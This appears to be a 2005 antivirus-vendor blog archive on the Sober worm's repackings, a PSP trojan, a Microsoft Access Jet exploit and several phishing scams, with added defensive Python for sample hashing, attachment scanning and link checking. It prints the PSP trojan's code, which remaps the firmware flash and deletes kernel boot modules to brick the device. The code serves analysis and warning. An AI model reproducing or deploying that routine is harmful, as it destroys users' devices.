
SOBER Worm Fights Microsoft

  • Posted: October 7, 2005
  • Author: Virus analyst

The new WORM_SOBER.AC, now on yellow alert, includes a simple but effective anti-antivirus retaliation routine. What's more, its only target is... guess who? Microsoft!

Microsoft's Windows Malicious Software Removal Tool is what this new Sober variant goes after.

What it does is search the list of running processes for MRT.EXE (the process name of the Malicious Software Removal Tool), terminate MRT.EXE, and then display this message box:



The message box above, coupled with the fact that the Malicious Software Removal Tool appears to have run, may make an inexperienced user feel safe and assume the machine is not infected. Killing the cleanup tool before it can finish is a standard malware self-defence trick: a removal tool that exits unexpectedly is a sign of infection, not a clean bill of health.


New Sober worm: WORM_SOBER.AC

  • Posted: October 7, 2005
  • Author: Virus analyst

We were able to obtain samples of a new variant of the Sober worm through our email honeypot system at approximately 8 am this morning. Staying true to its Sober lineage, this worm spreads via email and uses its own SMTP engine.

At the moment the honeypot has intercepted 300 emails carrying the worm, and counting.

For further details, refer to the virus report, which is now available.




We have received, and are still receiving, samples of repacked versions of WORM_SOBER.AC. Yes, you read that right: versionS. More samples are flooding in with essentially the same characteristics but with different MD5 hashes.

The email details of these repacked versions differ from the previous one. All of the samples in the new wave of WORM_SOBER.AC are packed with the same packer, FSG, and have had garbage code added. The garbage code varies from sample to sample; samples with identical garbage code have identical MD5s, so the difference in garbage code is what accounts for the difference in MD5. This is in contrast to the initial batch of WORM_SOBER.AC samples, which were UPX-packed and all shared a single MD5 value.




In case there's any confusion, here is an explanation of the "repacked" version of this worm.

For the purpose of discussion, let's call the WORM_SOBER.AC packed with UPX WORM_SOBER_UPX and the so-called repacked version WORM_SOBER_FSG, since it is packed with FSG.

When I executed WORM_SOBER_FSG, it dropped and executed a copy of WORM_SOBER_UPX. In other words, WORM_SOBER_FSG is just a trojan dropper for WORM_SOBER_UPX.

Hope that clears things up...



We are now receiving yet another version of WORM_SOBER.AC. Instead of FSG, this one is packed with MEW.

So we now have:

  • WORM_SOBER.AC (UPX packed) – the actual worm that spreads.
  • WORM_SOBER.AC (FSG packed) – a dropper for WORM_SOBER.AC (UPX packed).
  • WORM_SOBER.AC (MEW packed) – a dropper for WORM_SOBER.AC (UPX packed).
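The repacking described above (one UPX-packed worm wrapped in FSG and MEW droppers, with every change in the garbage bytes producing a new MD5) is the reason analysts hash more than the whole file. The following Python is an added example, not code from the original post or from Trend Micro. It builds three tiny constructed PE images (a UPX-style payload and two "repacks" that share section data but differ in trailing garbage), then hashes each as a whole file and by its section contents. The images are not executables, and modelling the garbage code as an appended overlay is an assumption made for the illustration; in the real samples it may sit inside the sections.

```python
import hashlib
import struct

FILE_ALIGN = 0x200


def build_pe(sections, overlay=b""):
    """Build a minimal, non-executable PE image for testing: MZ stub, PE signature,
    COFF header (zero-length optional header), section table, raw section data and
    an optional trailing overlay. Constructed data, not a real binary."""
    n = len(sections)
    hdr_len = 0x40 + 4 + 20 + 40 * n
    hdr_padded = -(-hdr_len // FILE_ALIGN) * FILE_ALIGN
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)          # e_lfanew -> PE signature
    coff = struct.pack("<HHIIIHH", 0x14C, n, 0, 0, 0, 0, 0x0102)
    table, body, raw_ptr = bytearray(), bytearray(), hdr_padded
    for name, data in sections:
        raw_size = -(-len(data) // FILE_ALIGN) * FILE_ALIGN
        # IMAGE_SECTION_HEADER: Name, VirtualSize, VirtualAddress, SizeOfRawData,
        # PointerToRawData, relocs/linenumbers (unused), Characteristics
        table += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"),
                             len(data), 0, raw_size, raw_ptr, 0, 0, 0, 0, 0x60000020)
        body += data.ljust(raw_size, b"\0")
        raw_ptr += raw_size
    header = bytes(dos) + b"PE\0\0" + coff + bytes(table)
    return header.ljust(hdr_padded, b"\0") + bytes(body) + overlay


def parse_sections(pe):
    """Return ([(name, raw_bytes), ...], overlay) for a PE image."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    n_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + opt_size
    sections, end = [], 0
    for i in range(n_sections):
        name, _vsize, _va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", pe, table + 40 * i)
        sections.append((name.rstrip(b"\0").decode("ascii", "replace"),
                         pe[raw_ptr:raw_ptr + raw_size]))
        end = max(end, raw_ptr + raw_size)
    return sections, pe[end:]          # anything past the last section is overlay


def triage(samples):
    """Whole-file MD5 next to the MD5 of the concatenated section data (overlay excluded)."""
    report = {}
    for label, pe in samples.items():
        sections, overlay = parse_sections(pe)
        report[label] = {
            "file_md5": hashlib.md5(pe).hexdigest(),
            "section_md5": hashlib.md5(b"".join(d for _, d in sections)).hexdigest(),
            # UPX names its sections UPX0/UPX1/UPX2; other packers are left 'unknown' here
            "packer": "UPX" if any(n.startswith("UPX") for n, _ in sections) else "unknown",
            "overlay_len": len(overlay),
        }
    return report


def constructed_samples():
    """Constructed images: a UPX-style payload and two repacks that share section data
    but differ only in appended garbage (assumption, see the lead-in)."""
    upx_stub = b"\x60\xBE" + b"\x90" * 44              # placeholder unpacking stub
    dropper_stub = b"\x55\x8B\xEC" + b"\x90" * 30       # placeholder dropper code
    payload = b"SOBER-PAYLOAD-BYTES" * 30               # placeholder packed body
    return {
        "sober_upx": build_pe([("UPX0", b""), ("UPX1", upx_stub + payload)]),
        "repack_a": build_pe([(".text", dropper_stub), (".data", payload)], overlay=b"\xCC" * 77),
        "repack_b": build_pe([(".text", dropper_stub), (".data", payload)], overlay=b"\x90\xCC" * 61),
    }


if __name__ == "__main__":
    for label, info in triage(constructed_samples()).items():
        print(f"{label:10} packer={info['packer']:8} overlay={info['overlay_len']:4} "
              f"file_md5={info['file_md5']} section_md5={info['section_md5']}")
```

Run as a script, the two repacks print different file_md5 values but the same section_md5, which is the grouping an analyst wants when a wave of "new" hashes is really one dropper with different padding. The packer guess by section name is deliberately limited to UPX; FSG and MEW are better recognised by their entry-point code than by names.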


First PSP Trojan

  • Posted: October 7, 2005
  • Author: Virus analyst

Malware is not for computers alone. Some has evolved to infect mobile devices, not to mention some MP3 players. Now it has found another target, and you may be one of them: video game enthusiasts. The first trojan for the Sony PlayStation Portable (PSP) has been found. Originally the PSP could only run games approved by Sony, but, as with almost everything in computing, hacks are available that allow users to run their own code. The trojan poses as one such hacking tool for running other games. Instead, it deletes system files, rendering the device inoperable. Affected systems are PSPs with older firmware versions, such as 1.50. Every day malware authors find ways to widen the horizons of infection; the question now is, what could be next?

Here is the code as seen on a forum:

    _start:

    while(1)

    sceIoAssign:
        syscall 0x20a8

    sceIoRemove:
        syscall 0x209e

    main:
        call FillVram(0)
        call Print(1,1,0xFFFFFF,"PSP TEAM 2.0 Exploit Hack the 2.0 firmware")
        call Print(1,2,0xFFFFFF,"Thank's to toc2rta for the 2.0 exploit :) ")
        ; alias the firmware flash partition (lflash0 partition 0, the one holding kd/ and vsh/) as flash6:
        call sceIoAssign("flash6:", "lflash0:0,0", "flashfat2:", 0, 0, 0)
        ; delete kernel modules and VSH data the firmware needs to boot; the unit will not start again
        call sceIoRemove("flash6:/vsh/etc/index.dat")
        call sceIoRemove("flash6:/kd/loadcore.prx")
        call sceIoRemove("flash6:/kd/loadexec.prx")
        call sceIoRemove("flash6:/kd/init.prx")
        call Print(1,4,0xFFFFFF," Your 2.0 is hacked please reboot ")
        call Print(1,5,0xFFFFFF," Thank you PSP Team the french team")
        call Print(1,6,0xFFFFFF," FuCk yoshihiro and SonyxTeam Looser")


Meanwhile, we are currently acquiring a sample, so watch for updates.

For more information, you may visit this site.


New Sober worm: WORM_SOBER.AC

  • Posted: October 6, 2005
  • Author: Virus analyst

We were able to obtain samples of a new variant of the Sober worm through our email honeypot system at approximately 8 am this morning. Staying true to its Sober lineage, this worm spreads via email and uses its own SMTP engine.

At the moment the honeypot has intercepted 300 emails carrying the worm, and counting.

For further details, refer to the virus report, which is now available.


Trojans Exploit Unpatched Microsoft Access Vulnerability

  • Posted: October 6, 2005
  • Author: Virus analyst

A macro embedded in an .mdb file has been found exploiting the "Microsoft Jet Database Engine Malformed Database File Buffer Overflow Vulnerability" in Microsoft Access, leading to infection of the user's system.
This macro is now detected as A2KM_HESIB.A.

Once this .mdb file (A2KM_HESIB.A) is opened in Microsoft Access, it uses the vulnerability mentioned above to drop and execute an executable named CSRSE.EXE (BKDR_HESIB.A) in the Windows temporary folder.

This shows that malware authors' attacks are not limited to Internet Explorer and Windows OS vulnerabilities; Microsoft Office applications are targets too.

Another malware family that targets Microsoft Office applications is W2KM.PASSPRO.

The vulnerability mentioned above remains unpatched at the time of writing.


eBay Phishing Scam

  • Posted: October 4, 2005
  • Author: Virus analyst

We have received a sample email from an eBay phishing scam.

In an attempt to fool the recipient into following the hyperlink provided (see the sample email below), the message pretends to originate from the eBay SafeHarbor Department and notifies the eBay member that someone may have been using his/her account, which will be suspended within the next 72 hours unless it is "updated".

Sample Email




If the unsuspecting user clicks the hyperlink, he/she is redirected to this page.




Notice the difference between the URL displayed in the email and the destination URL? They are very different, right? That alone should be suspicious enough not to disclose any sensitive information on the site. But if the unaware user continues and enters his/her account information, he/she ends up on this page (see below).




If the still-unaware user proceeds to disclose the very sensitive information asked for above, the next notification email he receives from eBay might just be real!


On MS Jet Vulnerability

  • Posted: October 4, 2005
  • Author: Virus analyst

We received reports of malware exploiting a known vulnerability in Microsoft's Jet Database Engine. This vulnerability became public in April 2005 and involves specially crafted .mdb files. The detection name for the malware is TROJ_MSADB.B.

We are currently acquiring undetected samples of malware that exploit this vulnerability. Note that Microsoft still has no fix for it, so malware authors may exploit this known vulnerability even more. Users should be aware of this vulnerability and not trust unsolicited .mdb files, even when they come from known contacts.
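Both Jet posts (this one and "Trojans Exploit Unpatched Microsoft Access Vulnerability" above) end with the same advice: do not open unsolicited .mdb files. A mail filter that keys on the extension alone misses a database renamed to .txt or .dat, so the following Python, an added example and not code from the original posts or from Trend Micro, identifies Access/Jet databases by their fixed header ("Standard Jet DB" at file offset 4 for Jet 3.x/4.0 .mdb files, "Standard ACE DB" for .accdb) and checks every attachment of a constructed message built with the standard library's email package. The sample attachments are a header followed by zero bytes, not a real database and not the malicious file; the check identifies the file type, not the exploit.

```python
from email import message_from_bytes, policy
from email.message import EmailMessage

JET_MAGIC = b"Standard Jet DB"   # Jet 3.x / 4.0 (.mdb), stored at file offset 4
ACE_MAGIC = b"Standard ACE DB"   # Access 2007+ (.accdb), same offset
RISKY_EXT = (".mdb", ".mde", ".accdb", ".accde")


def classify_attachment(filename, data):
    """Return 'access-db', 'access-db-renamed', 'access-ext-no-magic', or None.
    The magic check decides; the extension only refines the verdict."""
    has_magic = data[4:19] in (JET_MAGIC, ACE_MAGIC)
    has_ext = (filename or "").lower().endswith(RISKY_EXT)
    if has_magic and has_ext:
        return "access-db"
    if has_magic:
        return "access-db-renamed"          # extension hides what the file is
    if has_ext:
        return "access-ext-no-magic"        # Access would refuse it, still block it
    return None


def scan_message(raw):
    """Scan every attachment of an RFC 5322 message for Access/Jet databases."""
    msg = message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        data = part.get_payload(decode=True) or b""
        verdict = classify_attachment(part.get_filename(), data)
        if verdict:
            findings.append((part.get_filename(), verdict))
    return findings


def build_constructed_message():
    """Constructed test message: a Jet-style header (page 0 is 2048 bytes) attached
    once under its real extension, once renamed, plus a bogus empty .mdb."""
    fake_mdb = b"\x00\x01\x00\x00" + JET_MAGIC + b"\x00" * (2048 - 4 - len(JET_MAGIC))
    msg = EmailMessage()
    msg["From"] = "colleague@example.net"
    msg["To"] = "you@example.net"
    msg["Subject"] = "updated customer list"
    msg.set_content("Please open the attached database.")
    msg.add_attachment(fake_mdb, maintype="application", subtype="octet-stream", filename="customers.mdb")
    msg.add_attachment(fake_mdb, maintype="application", subtype="octet-stream", filename="notes.txt")
    msg.add_attachment(b"hello", maintype="application", subtype="octet-stream", filename="empty.mdb")
    return msg.as_bytes()


if __name__ == "__main__":
    for name, verdict in scan_message(build_constructed_message()):
        print(f"{name:15} {verdict}")
```

At a gateway the verdict would feed a quarantine rule; at minimum, "access-db-renamed" deserves a human look, because a legitimate sender has no reason to disguise a database as a text file.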


Redcross Phishing Site

  • Posted: October 4, 2005
  • Author: Virus analyst

Are you a philanthropist, willing to help those in need?

I hope your donations really reach those who need them, and not the opportunistic phishers waiting to get rich!

I got an alert from one of our sources that a Red Cross phishing site had been set up on the Internet. I verified the information and found that it is indeed a Red Cross phishing site! Take a look below at the supposed Red Cross donation page.




At first glance it may look legitimate, but look again, this time at the URL of the site (refer to the enlarged picture). Does it still look legitimate to you? I hope you will agree with me on a big NO! This is one of the common phishing techniques: the supposedly real URL is appended to the end of the actual site or domain you are visiting (in this case www.quadrate-stadt.de). It catches users who keep the address bar hidden.




By enabling the address bar you can see which site or domain you are really on.

Notice the distorted rollover image (enclosed by the smaller circle)? This must be intentional, because the location the rollover image points to is the same location you are redirected to after you have provided the required information and pressed the Continue button, as shown in the next picture.




Now, this should be a lesson for everyone who uses a credit or debit card, or anything of the sort, online: be responsible enough not to disclose any information over an unsecured channel, which in this case means plain HTTP. The current standard for submitting such information is SSL, that is, sites whose address starts with https. That gives us at least some assurance that the information we send over the Internet reaches the intended recipient intact. Note that https alone is not proof of legitimacy: it only authenticates the host named in the address bar and encrypts the session, and a phishing site can be served over https too, so the domain in the address bar still has to be the right one.

I've checked the different URLs on the web site and found that only the locations the "Continue", "Cancel", and "VeriSign" buttons point to are fake. So if you check the other clickable images or hyperlinks on the site, apart from the three (3) buttons just mentioned, you are redirected to the real site! Stealthy, isn't it?
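The phishing posts on this page turn on two observations: the address you are shown (the link text in the email, or a familiar name buried in the URL) is not the domain you are actually on, and a page that collects card or account data over plain http is unprotected whatever it claims about SSL. The following Python is an added example, not code from the original posts or from Trend Micro. It parses a constructed email body modelled on the eBay messages (placeholder hosts in the 203.0.113.0/24 documentation range, not the real samples' addresses), compares each link's visible URL with its real destination, and then judges a landing URL the way this Red Cross post does. The Red Cross path in the usage note is constructed; only the host www.quadrate-stadt.de comes from the post. The registrable-domain helper is a deliberate two-label approximation, and the userinfo check (http://brand@host/) goes beyond what the posts describe.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Brands whose names a phishing page borrows; extend for your own watch list.
BRANDS = ("ebay.com", "redcross.org")

# Constructed HTML standing in for the phishing emails in the eBay posts.
SAMPLE_EMAIL_HTML = """
<p>Your eBay account will be suspended in 48 hours unless you verify it.</p>
<p><a href="http://203.0.113.10/cgi-bin/ebay/verify.php">https://signin.ebay.com/ws/eBayISAPI.dll</a></p>
<p>Help: <a href="http://pages.ebay.com/help/">http://pages.ebay.com/help/</a></p>
<p><a href="http://ebay.com.account-verify.example/">Verify now</a></p>
"""


class LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs from <a> elements."""

    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href") or "", []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def registrable(host):
    """Crude registrable-domain guess (last two labels); assumption made so the
    example runs offline. Use a public-suffix list in production."""
    parts = host.lower().rstrip(".").split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host.lower()


def analyze_url(url, collects_secrets=True):
    """Reasons to distrust a destination URL, judged from the URL alone."""
    u = urlparse(url)
    host = u.hostname or ""
    real = registrable(host)
    reasons = []
    if collects_secrets and u.scheme != "https":
        reasons.append("served over plain http, whatever the page claims about SSL")
    if u.username:                      # http://www.brand.org@evil.example/ style
        reasons.append(f"userinfo '{u.username}@' precedes the real host {host}")
    for brand in BRANDS:
        if real == brand:
            continue
        if brand in host.lower():
            reasons.append(f"'{brand}' is only a label inside the host; the domain is {real}")
        elif brand in (u.path + "?" + u.query).lower():
            reasons.append(f"'{brand}' appears only in the path or query; the domain is {real}")
    return {"real_domain": real, "reasons": reasons}


def audit_email_links(html):
    """Flag anchors whose visible URL names a different domain than the href,
    plus whatever analyze_url finds about the href's host (scheme is not judged
    here, since a link in a message is not yet a form)."""
    parser = LinkCollector()
    parser.feed(html)
    findings = []
    for href, text in parser.links:
        reasons = []
        shown = urlparse(text).hostname if "://" in text else None
        real = urlparse(href).hostname or ""
        if shown and registrable(shown) != registrable(real):
            reasons.append(f"displays {shown} but goes to {real}")
        reasons += analyze_url(href, collects_secrets=False)["reasons"]
        if reasons:
            findings.append((href, text, reasons))
    return findings


if __name__ == "__main__":
    for href, text, reasons in audit_email_links(SAMPLE_EMAIL_HTML):
        print(href, "<-", text or "(no URL shown)", reasons)
    # Constructed path on the host named in the Red Cross post:
    print(analyze_url("http://www.quadrate-stadt.de/www.redcross.org/donate/index.html"))
```

The email audit flags the first link (displayed signin.ebay.com, destination a bare IP) and the third (ebay.com is merely a label inside another domain), and leaves the genuine help link alone. The Red Cross URL collects two reasons: plain http, and a brand name that lives in the path while the domain is quadrate-stadt.de, exactly the trick the screenshot shows.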




There are many phishing sites on the World Wide Web, and many of them can be avoided simply by observing the basic security measures mentioned above.

These phishers keep operating, or, sadly, are inspired to set up new sites, because there are still many online users who get hooked by their scams.

If we keep ourselves up to date on current threats, and especially on their countermeasures such as these, we are one step ahead in securing our own identity, and at the same time we help the security community fight this malicious activity.

And most importantly, your help will reach those who really need it! :)


Another eBay Phishing Scam

  • Posted: October 3, 2005
  • Author: Virus analyst

Just a couple of hours ago, we received another sample email from an eBay phishing scam.

Only this time it is more straightforward, and the grace period for verifying the emailed information has been cut from 72 hours to 48 hours before the account will be suspended by "them". See the sample email below.




If you follow the first hyperlink in the email, you arrive at this page.




Now, that's what I call straightforward! It is just one click away from taking your identity, ha!

Notice again the difference between the URL displayed in the email and the destination URL? That should at least make you think something "phishy" is going on. What is even more suspicious about the website is that it states

"All the data is protected by the industry standard SSL encryption"

whereas the session is using plain HTTP!

Conclusion
As we are all aware, it was in 2003 that we saw the proliferation of eBay phishing scams, in which users receive emails telling them to verify and update their account information within a specified time or have their account suspended.

It seems that many are still being fooled by this scam, which is why many fake eBay sites are still being set up, online, and ready to steal your identity whenever you choose to let them!


YM Phishing Site

  • Posted: September 27, 2005
  • Author: Virus analyst

A new Yahoo phishing site has been spotted at
http://www.geocities.com/myphotos30021. It spoofs the Yahoo! Photos site.
Below is a snapshot of the site.

The site has already been submitted to the Web Blocking Team.

Tags: Smishing
  • Copyright © 2021 Trend Micro Incorporated. All rights reserved.